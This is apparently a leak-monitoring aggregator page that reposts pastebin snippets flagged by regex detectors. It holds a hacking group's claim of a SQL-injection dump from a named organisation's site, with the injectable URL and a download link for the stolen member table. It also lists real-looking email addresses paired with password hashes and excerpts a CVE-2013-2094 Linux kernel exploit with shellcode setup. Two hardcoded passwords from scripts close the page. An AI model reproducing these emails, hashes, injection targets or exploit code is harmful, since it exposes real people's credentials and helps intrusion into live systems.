LeakedIn Logo
Stories About Data Leaks and Related Stuff

Potential leak of data: Targeted Website

0 votedvote

Detected 1 occurrence(s) of ‘^target:\s*(http|www)’:

MTT HAXORS
~Machiavelli~

Target:	http://www.cmocouncil.org/download-center.php?id=%Inject_Here%269?
DB Detection:	MySQL >=5 
Method:	GET
Type:	String
Data Base:	cmo_website
Table:	member
Total Rows:	10498


DOWNLOAD ALL INFO HERE: http://wikisend.com/download/405882/CMO.html

Source: http://pastebin.com/raw.php?i=cYLYnuHG

Potential leak of data: Email Addresses List

0 votedvote

Detected 297 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[:,\|]*.*’:

i2000@aol.com	06f03c0d296d06f03c42f274ff1e88a8
zgerard@free.fr	4b006b873595ea622d5b9472609be419
zhumgb@nysjqt.com	ed465b5e3e6f1ebea93f876b0955ebb6
zitouness@sfr.fr	7c6ffd116cfb0eddad661dfaa6dfafb2
zwozniakj@wanadoo.fr	a8557428576f6801799c481094130263
zz@numericable.fr	d92e9cc5051723ab2bcff699ac5f14e6

Detected 296 occurrence(s) of ‘[\s\|,;']+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:']+’:

eni2000@aol.com	06f03c0d296d06f03c42f274ff1e88a8
zgerard@free.fr	4b006b873595ea622d5b9472609be419
zhumgb@nysjqt.com	ed465b5e3e6f1ebea93f876b0955ebb6
zitouness@sfr.fr	7c6ffd116cfb0eddad661dfaa6dfafb2
zwozniakj@wanadoo.fr	a8557428576f6801799c481094130263
zz@numericable.fr	d92e9cc5051723ab2bcff699ac5f14e6

Detected 297 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+’:

i2000@aol.com	06f03c0d296d06f03c42f274ff1e88a8
zgerard@free.fr	4b006b873595ea622d5b9472609be419
zhumgb@nysjqt.com	ed465b5e3e6f1ebea93f876b0955ebb6
zitouness@sfr.fr	7c6ffd116cfb0eddad661dfaa6dfafb2
zwozniakj@wanadoo.fr	a8557428576f6801799c481094130263
zz@numericable.fr	d92e9cc5051723ab2bcff699ac5f14e6

Source: http://pastebin.com/raw.php?i=nj5xyHms

Potential leak of data: CVE Reference

0 votedvote

Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:

/*
 * CVE-2013-2094 exploit x86_64 Linux < 3.8.9
 * by sorbo (sorbo@darkircop.org) June 2013
 *
 * Based on sd's exploit.  Supports more targets.
 *
 */
 
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include 

Detected 1 occurrence(s) of ‘shellcode’:

);
    }
 
    printf("Using interrupt %d\n", intr);
 
    off -= 16 * intr;
 
    assert((off % sz) == 0);
 
    off /= sz;
    off = -off;
 
//  printf("Offset %lx\n", off);
 
    kbase = (uint8_t*) (idt.addr & 0xFF000000);
 
    printf("Shellcode at %p\n", kbase);
 
    if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
        err(1, "mmap()");
 
    memset(kbase, 0x90, KSIZE);
    kbase += KSIZE - 1024;
 
  

Source: http://pastebin.com/raw.php?i=WSEYVhqe

Potential leak of data: Simple Password

0 votedvote

Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*["'][a-z0-9\-_\!\$]+["']‘:

f leecher failed to join.  In seconds.

// =============================================================================
// Game password (leave blank if none)
// =============================================================================

var gamepassword = "sk";

// =============================================================================
// UseCDKeyChangeTrick :
// if true, the follow bot will say his gamename/gamepwd (set in the OOG) in chat before each game
//          in order to increment his numbe

Source: http://pastebin.com/raw.php?i=aECPERf4

Potential leak of data: Simple Password

0 votedvote

Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*["'][a-z0-9\-_\!\$]+["']‘:

os.pullEvent = os.pullEventRaw
local side = "buttom"
local password = "barbonazzo08"
while true do
 term.clear()
 term.setCursorPos(1,1)
 write("Password: ")
 local input = read("*")
 if input == password then
  term.clear()
  term.setCursorPos(1,1)
  print("Password corretta")
  rs.setOutput(side,true)
  sleep(5)
  rs.setOutp

Source: http://pastebin.com/raw.php?i=ttzm0fKW